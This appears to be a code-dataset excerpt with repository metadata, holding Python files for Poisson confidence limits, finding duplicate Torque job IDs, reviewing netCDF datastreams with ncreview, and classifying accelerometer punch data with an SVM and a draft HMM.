text stringlengths 0 1.05M | meta dict |
|---|---|
# Approximations to Poisson upper and lower limits
# presently only for 1-sigma confidence limits
# from Gehrels 1986.
# Could extend to general CI using Ebeling 2003/4 (astro-ph/0301285),
# which builds from Gehrels 1986.
import numpy as N
def upper_limit_1_sigma(n):
    """Approximate 1-sigma (84.13% one-sided) Poisson upper limit for n counts.

    Uses the Gehrels (1986) approximation with S = 1; works on scalars
    and numpy arrays alike.
    """
    m = n + 1.0
    correction = 1.0 - 1.0/(9.0*m) + 1.0/(3.0*N.sqrt(m))
    return m * correction**3
def lower_limit_1_sigma(n):
    """Approximate 1-sigma (84.13% one-sided) Poisson lower limit for n counts.

    Uses the Gehrels (1986) approximation with S = 1.  The formula divides
    by n and sqrt(n), so it is undefined at n = 0 (the original raised
    ZeroDivisionError for scalar input); the true lower limit there is 0,
    which is what this returns for n <= 0.  Accepts scalars or numpy arrays.
    """
    n = N.asarray(n, dtype=float)
    # silence the 1/0 warning for array input; the bad entries are masked below
    with N.errstate(divide='ignore', invalid='ignore'):
        limit = n*(1.0 - 1.0/(9.0*n) - 1.0/(3.0*N.sqrt(n)))**3
    limit = N.where(n > 0.0, limit, 0.0)
    # preserve scalar-in / scalar-out behaviour
    return limit.item() if limit.ndim == 0 else limit
# def ebeling_upper_limit(n, S):
# bi = N.array([)
# c01 = 0.50688
# c02 = 2.27532
# c1i = N.array([...])
# c2i = N.array([...])
# c3i = N.array([...])
# c4i = N.array([...])
# b = 0.0
# for i in range(8):
# b += bi[i] * S**i
# c = 0.0
# if S <= S01:
# for i in range(4):
# c += c1i[i] * (1.0/(S-S01))**i
# if S > S01 and S <= 1.2:
# for i in range(4):
# c += c2i[i] * (N.log10(S-S01))**i
# if S > 1.2 and S <= S02:
# for i in range(3):
# c += c3i[i] * (1.0/(S-S02))**i
# if S > S02:
# for i in range(7):
# c += c4i[i] * (N.log10(S-S02))**i
# return (n+1)*(1 - 1/(9*(n+1)) + S/(3*sqrt(n+1)) + b*(n+1)**c)**3
| {
"repo_name": "bamford/astrobamf",
"path": "poisson.py",
"copies": "1",
"size": "1134",
"license": "mit",
"hash": 2309365434581297000,
"line_mean": 28.0769230769,
"line_max": 77,
"alpha_frac": 0.4920634921,
"autogenerated": false,
"ratio": 2.032258064516129,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.3024321556616129,
"avg_score": null,
"num_lines": null
} |
#!/apps/admin/tools.x86_64/python/2.7.3/bin/python
# Takes a path to a file, opens the file, parses the data into chunks, looks for duplicates, and prints those to a file.
#
#
#
import os
import sys
import sets
import argparse
from glob import glob
# Command-line interface.  Both options are optional and fall back to glob()
# defaults.  NOTE(review): the --output default globs a literal path, which
# yields an *empty list* when /tmp/duplicate_job_ids.txt does not yet exist.
ap = argparse.ArgumentParser()
ap.add_argument("--files", "-f", dest="files", nargs='+', action="store", required=False,
                help="Use the accounting records in these files",
                default=glob('/var/spool/torque/server_priv/accounting/*'))
ap.add_argument("--output", "-o", dest="output", nargs='+', action="store", required=False,
                help="Output file location",
                default=glob('/tmp/duplicate_job_ids.txt'))
args = ap.parse_args()
#Parse input files. Borrowed from Derek's qhistory script
def parse_files(filenames, debug):
    """Read each named file and return a list of their full contents.

    Parameters:
        filenames  iterable of file paths to read
        debug      accepted for interface compatibility; unused

    Bug fix: the original wrote ``f.close`` without parentheses, so the
    method was never called and every file handle leaked.  A with-statement
    guarantees each handle is closed even if read() raises.
    """
    texts = []
    for fname in filenames:
        with open(fname, 'r') as f:
            texts.append(f.read())
    return texts
#Function to clear output files and ensure they can be written to
def clear_output(filenames, debug):
    """Overwrite each named file with a single space, verifying writability.

    Returns the (closed) handle of the last file touched, matching the
    original contract; raises if any file cannot be opened for writing.
    The debug parameter is unused.
    """
    for fname in filenames:
        handle = open(fname, 'w')
        handle.write(" ")
        handle.close()
    return handle
# Declare variables and set static information.
# NOTE(review): list_of_files and list_of_logs are never used below.
# pre_split_line is seeded with a single space so the first splitlines()
# entry is " ".
list_of_files = set()
pre_split_line = " "
list_of_logs = " "
try:
    # str() of the file list is only used here as a sanity probe;
    # args.files itself is passed to parse_files() below.
    path_to_file = str(args.files)
except:  # NOTE(review): bare except hides real errors; str() rarely fails
    print "Invalid path for accounting data."
    print args.files
    exit(0)
# Capture the output of parse_files() and then split the combined text on
# spaces (torque accounting records are whitespace-separated).
text_of_file = "".join(parse_files(args.files, 0))
split_file_text = text_of_file.split(" ")
# Find tokens containing ";S;" (torque job-start records) and keep field 2
# after splitting on ';' (the job id), one per line.
for line in split_file_text:
    if (line.find(";S;") != -1):
        line_text = line.split(";")
        pre_split_line += "\n" + str(line_text[2])
# Split the accumulated text into a list of job ids.
textlist = pre_split_line.splitlines()
# Clear the output file and make sure it can be written to.
try:
    file_location = clear_output(args.output, 0)
except:
    print "No output file given"
    exit(0)
try:
    # NOTE(review): str(args.output) stringifies a *list* (e.g. "['/tmp/x']"),
    # so this open() targets an odd filename; args.output[0] was probably
    # intended -- confirm.
    output = open(str(args.output), 'a')
except:
    print "Could not open " + str(args.output) + " for appending"
# Count repeat occurrences and record duplicates.
# NOTE(review): list.count() inside the loop is O(n^2) and each duplicate
# id is written once *per occurrence*; collections.Counter would fix both.
for line in textlist:
    count = textlist.count(line)
    if (count > 1):
        output.write(line + " \n")
print args.output
output.close()
| {
"repo_name": "ixela/torque-duplicate-jobs",
"path": "find_duplicate_jobs.py",
"copies": "1",
"size": "2493",
"license": "mit",
"hash": -788278667127020700,
"line_mean": 30.5569620253,
"line_max": 178,
"alpha_frac": 0.6915363016,
"autogenerated": false,
"ratio": 3.3918367346938774,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.45833730362938774,
"avg_score": null,
"num_lines": null
} |
#!/apps/base/python3/bin/python3
'''Command line interface to the datastream and datastreamdiff review modules.
Provides a command line interface to the functionality inside of the
datastream and datastreamdiff modules, which writes the resulting json string
to the user's ncreview_web directory.
'''
import os
import re
import csv
import sys
import time
import json
import errno
import argparse
import datetime as dt
import ncr.utils as utils
from ncr.datastream import Datastream
from ncr.datastreamdiff import DatastreamDiff
import pdb
### Progress Bar ------------------------------------------------------------------------------------------------------
class ProgressBar:
    '''Reports progress of loading datastreams, and estimates time remaining.'''

    def __init__(self, total_size, progress_bar_width=50):
        '''Initialize a progress bar.

        Parameters:
            total_size          total number of bytes to process
            progress_bar_width  character width of the progress bar
        '''
        # Bug fix: the original hardcoded 50 here, silently ignoring the
        # progress_bar_width argument.
        self.progress_bar_width = progress_bar_width
        self.processed_size = 0
        self.total_size = total_size
        # Bug fix: time.clock() was deprecated in Python 3.3 and removed in
        # 3.8; perf_counter() is the documented replacement for measuring
        # elapsed intervals.
        self.start_time = time.perf_counter()

    def start(self):
        '''Save the start time and print a progress bar at 0% progress.'''
        self.start_time = time.perf_counter()
        sys.stdout.write('\r[' + (' ' * self.progress_bar_width) + ']0%')

    def update(self, file_size):
        '''Add file_size to the processed total and redraw the bar with an ETA.

        The remaining-time estimate extrapolates linearly from throughput so
        far, deliberately overestimated by 10%.
        '''
        self.processed_size += file_size
        time_elapsed = time.perf_counter() - self.start_time
        total_time = time_elapsed * self.total_size / self.processed_size
        time_remain = (total_time - time_elapsed) * 1.1  # overestimate by 10%
        mins_remain = int(time_remain // 60)
        secs_remain = int(time_remain % 60)
        progress = self.processed_size / self.total_size
        sys.stdout.write('\r[{0}{1}]{2}% ~{3}:{4} left '.format(
            '#' * int(self.progress_bar_width * progress),
            ' ' * int(self.progress_bar_width * (1 - progress)),
            int(progress * 100),
            mins_remain,
            "%02d" % secs_remain)
        )
        sys.stdout.flush()

    def complete(self):
        '''Display a progress bar at 100%.'''
        print('\r[' + ('#' * self.progress_bar_width) + ']100%' + ' ' * 15)
### Parse Args --------------------------------------------------------------------------------------------------------
# Command-line interface for ncreview.
# NOTE(review): the description string below appears truncated ("summari").
parser = argparse.ArgumentParser(description='Review reprocessing between two directories, or summari',
    epilog='Note that if --begin and --end are unspecified when comparing datastreams, ' +
           'the time span chosen will be the intersection of the time periods spanned by both datastreams.')
parser.add_argument('old_dir', help='Old datastream directory')
parser.add_argument('new_dir', nargs='?', default=None,
    help='New datastream directory, exclude to simply review a single directory.')
parser.add_argument('--begin', '-b', default='00010101', metavar='YYYYMMDD', help='Ignore files before YYYYMMDD')
parser.add_argument('--end', '-e', default='99991231', metavar='YYYYMMDD', help='Ignore files after YYYYMMDD')
parser.add_argument('--sample_interval', '-t', default=None,
    help='Time interval to average data over in HH-MM-SS. If not provided, ' +
         'defaults to 1 day if more than 10 days are being processed, otherwise defaults to hourly samples')
parser.add_argument('--metadata_only', '-m', action='store_true', default=False,
    help='Review only metadata, ignoring variable data. Much faster than standard review.')
parser.add_argument('--write_dir', '-w', default=None, metavar='DIR', help='write output data files to specified directory')
parser.add_argument('--name', '-n', default=None,
    help='Specify custom name to be used for the run. Will be the directory name where the ' +
         'summary files ncreview creates are stored as well as the URL suffix.')
# convert time arguments
args = parser.parse_args()
# Get absolute directory paths; the webpage uses these to report where the
# datastreams came from.
args.old_dir = os.path.abspath(args.old_dir)
if args.new_dir: args.new_dir = os.path.abspath(args.new_dir)
if args.write_dir:
    args.write_dir = os.path.abspath(args.write_dir)
    if not os.path.exists(os.path.dirname(args.write_dir)):
        sys.stderr.write("Error: write directory %s does not exist\n" % os.path.dirname(args.write_dir))
        quit()
# YYYYMMDD strings -> datetime bounds (inclusive)
args.begin = dt.datetime.strptime(args.begin, '%Y%m%d')
args.end = dt.datetime.strptime(args.end, '%Y%m%d')
try:
    # HH-MM-SS -> total seconds
    if args.sample_interval is not None:
        h, m, s = args.sample_interval.split('-')
        args.sample_interval = int(h)*60*60 + int(m)*60 + int(s)
except:
    # NOTE(review): bare except -- ValueError is what split()/int() actually
    # raise; as written this also swallows e.g. KeyboardInterrupt.
    sys.stderr.write("Error: chunk time %s is invalid.\n" % args.sample_interval)
    quit()
### Review Data -------------------------------------------------------------------------------------------------------
def is_valid(fname):
    '''Return True when fname's parsed file time falls within [args.begin, args.end].

    Files whose names yield no parseable time (file_time returns None) are
    rejected.
    '''
    ftime = utils.file_time(fname)
    if ftime is None:
        return False
    return args.begin <= ftime <= args.end
# Normalize paths (harmless repeat of the abspath calls done above).
args.new_dir = os.path.abspath(args.new_dir) if args.new_dir else args.new_dir
args.old_dir = os.path.abspath(args.old_dir) if args.old_dir else args.old_dir
jdata = None
if args.new_dir:
    # --- comparison mode: diff old_dir against new_dir ---------------------
    new_files = sorted(filter(is_valid, os.listdir(args.new_dir)))
    old_files = sorted(filter(is_valid, os.listdir(args.old_dir)))
    if not new_files:
        raise RuntimeError(args.new_dir + ' contains no netCDF files in the specified time period.')
    if not old_files:
        raise RuntimeError(args.old_dir + ' contains no netCDF files in the specified time period.')
    # get the latest begin and earliest end
    sys.stdout.write('Determining comparison interval...')
    new_times = list(map(utils.file_time, new_files))
    old_times = list(map(utils.file_time, old_files))
    # intersection of the two time spans, widened to whole days
    args.begin = max(min(new_times), min(old_times)).replace(hour=0, minute=0, second=0, microsecond=0)
    args.end = min(max(new_times), max(old_times)).replace(hour=23, minute=59, second=59, microsecond=999)
    # re-filter the files with the new time bounds
    new_files = sorted(filter(is_valid, new_files))
    old_files = sorted(filter(is_valid, old_files))
    if not new_files or not old_files:
        raise RuntimeError('Old and New directories do not appear to have overlapping measurement ' +
                           'times in the specified time period. Cannot determine a comparison interval.')
    sys.stdout.write('\r')
    sys.stdout.write('Determining total file size...' + ' '*10)
    sys.stdout.flush()
    # total byte count drives the ProgressBar ETA
    total_size = 0
    for f in old_files:
        total_size += os.stat(args.old_dir + '/' + f).st_size
    for f in new_files:
        total_size += os.stat(args.new_dir + '/' + f).st_size
    progress_bar = ProgressBar(total_size)
    sys.stdout.write('\r')
    # read datastreams
    print('Loading datastreams...' + ' '*10)
    progress_bar.start()
    old_ds = Datastream(args.old_dir, args.begin, args.end, args.sample_interval, args.metadata_only, progress_bar)
    new_ds = Datastream(args.new_dir, args.begin, args.end, args.sample_interval, args.metadata_only, progress_bar)
    progress_bar.complete()
    # compare datastreams
    print('Comparing datastreams...')
    dsdiff = DatastreamDiff(old_ds, new_ds)
    jdata = dsdiff.jsonify()
else:
    # --- single-directory mode: summarize old_dir only ---------------------
    path = args.old_dir
    files = sorted(filter(is_valid, os.listdir(path)))
    if not files:
        raise RuntimeError(path + ' contains no netCDF files in the specified time period.')
    sys.stdout.write('Determining total file size...' + ' '*10)
    sys.stdout.flush()
    total_size = 0
    for f in files:
        total_size += os.stat(path + '/' + f).st_size
    progress_bar = ProgressBar(total_size)
    sys.stdout.write('\r')
    # read datastreams
    print('Loading datastream...' + ' '*10)
    progress_bar.start()
    ds = Datastream(path, args.begin, args.end, args.sample_interval, args.metadata_only, progress_bar)
    progress_bar.complete()
    jdata = ds.jsonify()
### Write out the data ------------------------------------------------------------------------------------------------
def unique_name(format_str, path):
    '''Produce a unique directory name at the specified path.

    Substitutes increasing integers into format_str (via str.format) until
    the resulting name does not yet exist under path, then returns it.
    '''
    candidate = 1
    while os.path.exists(path + '/' + format_str.format(candidate)):
        candidate += 1
    return format_str.format(candidate)
# get the path of the dir to write to
wpath = '/data/tmp/ncreview/'
if args.write_dir is not None:
    wpath = args.write_dir
    if not os.path.exists(wpath):
        os.mkdir(wpath)
# Build the run-directory name template consumed by unique_name().
format_str = ''
if args.name:
    format_str = args.name
    if os.path.exists(wpath + '/' + args.name):
        format_str += '.{0}'  # if the directory already exists, add a unique id
elif args.write_dir:
    format_str = '.ncr.' + dt.datetime.now().strftime('%y%m%d.%H%M%S')
    # NOTE(review): this tests the bare *relative* name rather than
    # wpath + '/' + format_str, so the exists() check is almost certainly
    # against the wrong path -- confirm.
    if os.path.exists(format_str):
        format_str += '.{0}'  # if the directory already exists, add a unique id
else:
    # default: <user>.<host>.<id> under /data/tmp/ncreview/
    format_str = '%s.%s.{0}' % (os.environ['USER'], os.environ['HOST'])
jdata_dir = unique_name(format_str, wpath)
jdata_path = wpath + '/' + jdata_dir + '/'
os.mkdir(jdata_path)
# Counter for numbering the csv side-files; shared across the recursion below.
n = 1
def separate_data(obj):
    '''Recursively move bulky data payloads out of the json tree into
    numbered ncreview.<n>.csv files under jdata_path, replacing each payload
    with the integer file id so the web page can fetch it lazily.
    '''
    global n
    to_separate = []
    if obj['type'] in ['plot', 'timeline', 'fileTimeline', 'timelineDiff']:
        to_separate = ['data']
    elif obj['type'] in ['plotDiff', 'fileTimelineDiff']:
        to_separate = ['old_data', 'new_data']
    for key in to_separate:
        # generate a unique csv file name
        while os.path.isfile(jdata_path + 'ncreview.{0}.csv'.format(n)): n += 1
        # write out the data as csv
        with open(jdata_path + 'ncreview.{0}.csv'.format(n), 'w', newline='') as csvfile:
            writer = csv.writer(csvfile, quoting=csv.QUOTE_NONNUMERIC)
            for row in obj[key]: writer.writerow(row)
        # make what was the data a reference to the file
        obj[key] = n
    # recurse into child sections
    if 'contents' in obj:
        for c in obj['contents']:
            separate_data(c)
separate_data(jdata)
# Write out the results as json
with open(jdata_path + 'ncreview.json', 'w') as jfile:
    jfile.write(json.dumps(jdata, default=utils.JEncoder))
# Derive the report URL: when this script lives under /home/<user>/...,
# serve through the user's public dsutil directory instead of the root.
first_dir, user, *_ = os.path.realpath(__file__).split('/')[1:]
location = '/~' + user + '/dsutil' if first_dir == 'home' else ''
url_string = jdata_dir;
if args.write_dir:  # if custom write location, put full path
    url_string = jdata_path
print("Complete!")
print("report at")
print('https://engineering.arm.gov' + location + '/ncreview/?' + url_string)
| {
"repo_name": "CesiumLifeJacket/overwatch",
"path": "dummy_project/ncreview.py",
"copies": "1",
"size": "10643",
"license": "mit",
"hash": 7615076391447453000,
"line_mean": 36.3438596491,
"line_max": 124,
"alpha_frac": 0.633843841,
"autogenerated": false,
"ratio": 3.595608108108108,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9702711858624677,
"avg_score": 0.005348018096686319,
"num_lines": 285
} |
# app/science.py
import os
import pandas as pd
import numpy as np
import random
import math
import itertools
from sklearn import svm
from flask import current_app
from app.data import db, query_to_list
from app.sensors.models import Experiment, Sensor
"""
Support vector machines (SVMs) are a set of supervised learning methods
used for classification, regression and outliers detection.
"""
# Absolute path of this module's directory; training csvs live under
# <module dir>/api/training.
_basedir = os.path.abspath(os.path.dirname(__file__))
UPLOADS = 'api/training'
UPLOAD_FOLDER = os.path.join(_basedir, UPLOADS)
"""
# LEGACY training data from phone
filename = '50_punches_labelled_pt1_pt2_combined.csv'
non_punch_filename = 'non_punch_pt1.csv'
non_punch_filename2 = 'non_punch_pt2.csv'
mix_filename = 'mix_labelled_pt1.csv'
"""
# NEW Training data from mbient
def to_setup():
    """Publish the training-data csv paths consumed by more_setup().

    Bug fix: the original bound every TRAIN_DATA* path as a function local,
    so the module-level names that more_setup() reads were never created and
    calling more_setup() raised NameError.  Declaring them global publishes
    them as intended.
    """
    global TRAIN_DATA, TRAIN_DATA2, TRAIN_DATA3, TRAIN_DATA4, TRAIN_DATA5
    global TRAIN_DATA6, TRAIN_DATA7, TRAIN_DATA8, TRAIN_DATA9, TRAIN_DATA10
    filename = 'MBIENT_straightPunch_chris.csv'
    filename2 = 'MBIENT_straightPunchtraining2_chris.csv'
    filename3 = 'MBIENT_straightPunchtraining3_chris.csv'
    filename4 = 'MBIENT_straightPunchtraining4_chris.csv'
    non_punch_filename = 'MBIENT_trainingGeneralMovement.csv'
    non_punch_filename2 = 'MBIENT_generalMotionTraining_chris.csv'
    non_punch_filename3 = 'MBIENT_gmt3.csv'
    hook_punch_filename = 'MBIENT_hookPunch_chris.csv'
    hook_punch_filename2 = 'MBIENT_hookpunchTraining_chris.csv'
    hook_punch_filename3 = 'MBIENT_hookpunchTraining2.csv'
    # straight-punch training sets
    TRAIN_DATA = UPLOAD_FOLDER + '/punch/' + filename
    TRAIN_DATA4 = UPLOAD_FOLDER + '/punch/' + filename2
    TRAIN_DATA5 = UPLOAD_FOLDER + '/punch/' + filename3
    TRAIN_DATA10 = UPLOAD_FOLDER + '/punch/' + filename4
    # hook-punch training sets
    TRAIN_DATA6 = UPLOAD_FOLDER + '/punch/' + hook_punch_filename
    TRAIN_DATA7 = UPLOAD_FOLDER + '/punch/' + hook_punch_filename2
    TRAIN_DATA8 = UPLOAD_FOLDER + '/punch/' + hook_punch_filename3
    # general-motion (non-punch) training sets
    TRAIN_DATA2 = UPLOAD_FOLDER + '/non_punch/' + non_punch_filename
    TRAIN_DATA3 = UPLOAD_FOLDER + '/non_punch/' + non_punch_filename2
    TRAIN_DATA9 = UPLOAD_FOLDER + '/non_punch/' + non_punch_filename3
# TEST_DATA = UPLOAD_FOLDER + '/labelled_test/' + mix_filename
def sql_to_pandas():
    """Placeholder for loading sensor rows from SQL into a dataframe (unimplemented)."""
    pass
def pandas_cleanup(df):
    """Return only the accelerometer and bookkeeping columns of df.

    Parameters:
        df  dataframe containing at least the six columns selected below

    Returns a column-subset view of df.  Removed an unused local
    (``columns = []``) from the original; the selection is unchanged.
    """
    return df[['ACCELEROMETER_X', 'ACCELEROMETER_Y', 'ACCELEROMETER_Z',
               'timestamp', 'experiment_id', 'Time_since_start']]
# Master column layout of the training csv exports; rows rebuilt by
# clean_up() are reindexed to this layout (columns not produced by the
# parse become NaN).
columns = ['ACCELEROMETER_X',
           'ACCELEROMETER_Y',
           'ACCELEROMETER_Z',
           'GRAVITY_X',
           'GRAVITY_Y',
           'GRAVITY_Z',
           'LINEAR_ACCELERATION_X',
           'LINEAR_ACCELERATION_Y',
           'LINEAR_ACCELERATION_Z',
           'GYROSCOPE_X',
           'GYROSCOPE_Y',
           'GYROSCOPE_Z',
           'MAGNETIC_FIELD_X',
           'MAGNETIC_FIELD_Y',
           'MAGNETIC_FIELD_Z',
           'ORIENTATION_Z',
           'ORIENTATION_X',
           'ORIENTATION_Y',
           'Time_since_start',
           'timestamp',
           'state']
# SHOULD REMOVE THE STATE COLUMN FOR NON TEST DATA
def clean_up(df):
    """Rebuild raw csv rows (parsed into the index as "(x, y, z)" tuples)
    into a dataframe with the full module-level `columns` layout.

    Bug fix: Series.str.replace treated the pattern as a regex by default in
    older pandas, where a bare '(' is an invalid expression; regex=False
    makes the intended literal replacement explicit and version-proof.
    """
    clean_df = pd.DataFrame(df.index.tolist(),
                            columns=['ACCELEROMETER_X', 'ACCELEROMETER_Y', 'ACCELEROMETER_Z'])
    clean_df = clean_df.applymap(str)
    clean_df = clean_df.apply(lambda s: s.str.replace('(', '', regex=False))
    clean_df = clean_df.apply(lambda s: s.str.replace(')', '', regex=False))
    # columns is the module-level master layout; missing columns become NaN
    clean_df = clean_df.reindex(columns=columns)
    return clean_df
def set_straight_punch(the_df):
    """Label every row of the_df as a straight punch (state == 1), in place.

    Returns the same dataframe object for chaining.
    """
    the_df['state'] = 1
    return the_df
def set_non_punch(my_df):
    """Label every row of my_df as general motion (state == 0), in place.

    Returns the same dataframe object for chaining.
    """
    my_df['state'] = 0
    return my_df
def set_hook_punch(hook_df):
    """Label every row of hook_df as a hook punch (state == 2), in place.

    Returns the same dataframe object for chaining.
    """
    hook_df['state'] = 2
    return hook_df
def more_setup():
    """Load every training csv, label it, and publish the combined frame.

    Requires to_setup() to have run first so the TRAIN_DATA* paths exist.

    Bug fix: the original assigned df_train as a function local, but
    my_svm() reads df_train at module scope; declaring it global publishes
    the combined training set as intended.
    """
    global df_train

    def _load(path, labeller):
        # each csv is read as one raw 'initial' column, rebuilt by clean_up,
        # then stamped with its class label
        frame = pd.read_csv(path, skiprows=[0], names=['initial'])
        return labeller(clean_up(frame))

    # ordering matches the original concat: straights, hooks, non-punches
    straights = [_load(p, set_straight_punch)
                 for p in (TRAIN_DATA, TRAIN_DATA4, TRAIN_DATA5, TRAIN_DATA10)]
    hooks = [_load(p, set_hook_punch)
             for p in (TRAIN_DATA6, TRAIN_DATA7, TRAIN_DATA8)]
    others = [_load(p, set_non_punch)
              for p in (TRAIN_DATA2, TRAIN_DATA9, TRAIN_DATA3)]
    df_train = pd.concat(straights + hooks + others, ignore_index=True)
# df_test = pd.read_csv(TEST_DATA, skiprows=[0], names=columns)
def my_svm(id):
    """
    Train a multi-class SVM on the module-level df_train (built by
    more_setup) and predict the punch type for every sensor row of the
    experiment with the given id, writing predictions back to the DB.

    As other classifiers, SVC, NuSVC and LinearSVC take as input two arrays:
    an array X of size [n_samples, n_features] holding the training samples,
    and an array y of class labels (strings or integers), size [n_samples]:
    """
    #=============================
    #TRAINING - TODO: MOVE THIS!!!
    #=============================
    x1 = df_train['ACCELEROMETER_X'].values
    x2 = df_train['ACCELEROMETER_Y'].values
    x3 = df_train['ACCELEROMETER_Z'].values
    y = df_train['state'].values
    X = np.column_stack([x1, x2, x3])
    clf = svm.SVC()
    clf.fit(X, y)
    #=============================
    # RUN DATA AGAINST THE MODEL
    #=============================
    # Load the pandas dataframe from the DB using the experiment id
    pandas_id = id
    current_app.logger.debug('Preparing to make prediction for experiment: {}'.format(pandas_id))
    query = db.session.query(Sensor).filter(Sensor.experiment_id == pandas_id)
    df = pd.read_sql_query(query.statement, query.session.bind)
    _x1 = df['ACCELEROMETER_X'].values
    _x2 = df['ACCELEROMETER_Y'].values
    _x3 = df['ACCELEROMETER_Z'].values
    _X = np.column_stack([_x1, _x2, _x3])
    my_prediction = clf.predict(_X)
    prediction_df = pd.DataFrame(my_prediction, columns=['prediction'])
    # Bug fix: predictions are the integer 'state' labels, so all three
    # replacements must match integers.  The original passed the *string*
    # "1" for straight punches, which never matched (its own trailing
    # comment -- "why is 0 not a string?" -- flagged the inconsistency).
    prediction_df = prediction_df.replace(to_replace=1, value="straight punch")  # 1 = straight punch
    prediction_df = prediction_df.replace(to_replace=2, value="hook punch")      # 2 = hook punch
    prediction_df = prediction_df.replace(to_replace=0, value="other")           # 0 = everything else
    df['prediction'] = prediction_df['prediction']
    current_app.logger.debug('DF length is: {}, which should match the number of predictions: {}'.format(len(df), len(prediction_df)))
    prediction_input2 = df.values.tolist()
    # itertools.izip: this module targets Python 2 (print statements appear
    # later in the file); pairs each ORM row with its dataframe row.
    for obj, new_value in itertools.izip(query, prediction_input2):
        obj.prediction = new_value[22]  # 22nd column is the prediction
        db.session.add(obj)
    db.session.commit()
    return 'prediction made'
def check_sequence(dataframe, index_value):
    """Decide whether the label at index_value marks one distinct punch.

    dataframe holds per-sample prediction labels.  The check passes when the
    4 samples *before* index_value are all punches and the 10 samples
    *after* it are all non-punch -- i.e. index_value looks like the tail end
    of a punch burst, so each burst is counted once.
    NOTE(review): indices within 4 of the start or 10 of the end of the
    series will produce out-of-range lookups here -- confirm callers only
    reach this for interior indices.
    """
    is_punch = []
    punch = ('straight punch','hook punch')
    # four indices looking backwards...
    prev_value = index_value - 1
    n_2 = index_value - 2
    n_3 = index_value - 3
    n_4 = index_value - 4
    # ...and ten looking forwards
    next_value = index_value + 1
    n2 = index_value + 2
    n3 = index_value + 3
    n4 = index_value + 4
    n5 = index_value + 5
    n6 = index_value + 6
    n7 = index_value + 7
    n8 = index_value + 8
    n9 = index_value + 9
    n10 = index_value + 10
    forward_chain = [next_value, n2, n3, n4, n5, n6, n7, n8, n9, n10]
    back_chain = [prev_value, n_2, n_3, n_4]
    # every forward sample must be a NON-punch for the check to pass
    for f_value in forward_chain:
        if (dataframe[f_value] not in punch):
            is_punch.append(True)
        else:
            is_punch.append(False)
    # every backward sample must be a punch
    for b_value in back_chain:
        if (dataframe[b_value] in punch):
            is_punch.append(True)
        else:
            is_punch.append(False)
    if False in is_punch:
        return False
    else:
        print 'punch detected for: {}'.format(index_value)
        return True
def count_calculator(df):
"""
takes the ML predictions and attempts to distinguish individual
motions (in this case punches) from the patterns therein
"""
print type(df)
print len(df)
counter = 0
# ========================================================
# Look for a sequence of 3 straight punches in a row to
# signify the beginning of a single punch
# ========================================================
try:
sp_values = df[df == 'straight punch'].index
print 'number of straight punch values {}'.format(len(sp_values))
# This gets us the index of the first straight punch value
first_value = df[df == 'straight punch'].index[0]
print first_value
except Exception as e:
current_app.logger.debug('Error calculating punch numbers: {}'.format(e))
counter = 0
# loop through all the indices of punches
for value in sp_values:
tick = check_sequence(df, value)
if tick == True:
counter += 1
return counter
| {
"repo_name": "ChristopherGS/sensor_readings",
"path": "app/science2.py",
"copies": "1",
"size": "9830",
"license": "bsd-3-clause",
"hash": 16390232753508896,
"line_mean": 31.8762541806,
"line_max": 179,
"alpha_frac": 0.6232960326,
"autogenerated": false,
"ratio": 3.012565124118909,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.41358611567189085,
"avg_score": null,
"num_lines": null
} |
# app/science.py
import os
import pandas as pd
import numpy as np
import random
import math
from sklearn import svm
"""
Support vector machines (SVMs) are a set of supervised learning methods
used for classification, regression and outliers detection.
"""
_basedir = os.path.abspath(os.path.dirname(__file__))
UPLOADS = 'api/uploads'
UPLOAD_FOLDER = os.path.join(_basedir, UPLOADS)
#dated
#filename = 'badboy_combined.csv'
#unlabelled_filename = 'badboy_unlabelled2.csv'
#PLAY_DATA = UPLOAD_FOLDER + '/' + filename
#PLAY_DATA2 = UPLOAD_FOLDER + '/' + unlabelled_filename
#df = pd.read_csv(PLAY_DATA)
#df_unlabelled = pd.read_csv(PLAY_DATA2)
#print df
def sql_to_pandas():
    """Placeholder for loading sensor rows from SQL into a dataframe (unimplemented)."""
    pass
def pandas_cleanup(df):
    """Return only the accelerometer and bookkeeping columns of df.

    Parameters:
        df  dataframe containing at least the five columns selected below

    Removed an unused local (``columns = []``) from the original; the
    column selection is unchanged.
    """
    return df[['accelerometer_x', 'accelerometer_y', 'accelerometer_z',
               'timestamp', 'experiment_id']]
#class HMM:
# def __init__(self):
# pass
def my_hmm():
    """
    Probability of being in a particular state at step i is known once we know
    what state we were in at step i-1
    Probability of seeing a particular emission
    at step i is known once we know what state we were in at step i.
    a sequence of observable X variable is generated
    by a sequence of internal hidden state Z.

    NOTE(review): exploratory prototype -- it cannot run as written: `df`
    and `df_unlabelled` are only defined in commented-out module code, and
    Model/State/DiscreteDistribution (pomegranate) and GaussianHMM
    (hmmlearn) are never imported anywhere in this module.
    """
    # linear dynamical system model needs to do the heavy lifting --> which can model the dynamics of a punch
    # the HMM will act as a switching mechanism, so that each hidden state will represent a gesture
    # but the gesture is learned by the linear dynamical system
    # Question is how to connect the two together
    # HACK - increase the components of the HMM...not sure
    # NOTE(review): the four dicts below are illustrative only; nothing
    # later in the function reads them.
    states = ('punch', 'other')
    observations = ('accelerometer_x', 'accelerometer_y', 'accelerometer_z')
    start_probability = {'punch': 0.4, 'other': 0.6}
    transition_probability = {
        'punch' : {'punch': 0.9, 'other': 0.1},
        'other' : {'punch': 0.2, 'other': 0.8}
    }
    # ARBITRARY VALUES - need to train the model
    emission_probability = {
        'punch' : {'accelerometer_x': 0.5, 'accelerometer_y': 0.4, 'accelerometer_z': 0.1},
        'other' : {'accelerometer_x': 0.1, 'accelerometer_y': 0.3, 'accelerometer_z': 0.6}
    }
    # QUESTION HOW DOES THIS WORK FOR CONTINUOUS SEQUENCES?
    startprob = np.array([0.4, 0.6])
    transition_matrix = np.array([[0.9, 0.1],
                                  [0.2, 0.8]])
    # need to understand the uncertainty of the observations
    # by understanding which state are they from
    # analysis of variance
    # so the mean is the values of the clusters
    # covariance (variance between two different random variables)
    """
    The covariance of each component
    covars = .5 * np.tile(np.identity(2), (4, 1, 1))
    creates array of 4 2x2 matrices with 0.5 on the diagonals and zero on the off diagonals
    4 links to the number of components
    how to check means? and covars?
    """
    # means --> (array, shape (n_components, n_features)) Mean parameters for each state.
    # in this case 2 x 3
    # means = ?
    # covars = ?
    # model = hmm.GuassianHMM(3, "full", startprob, transition_matrix)
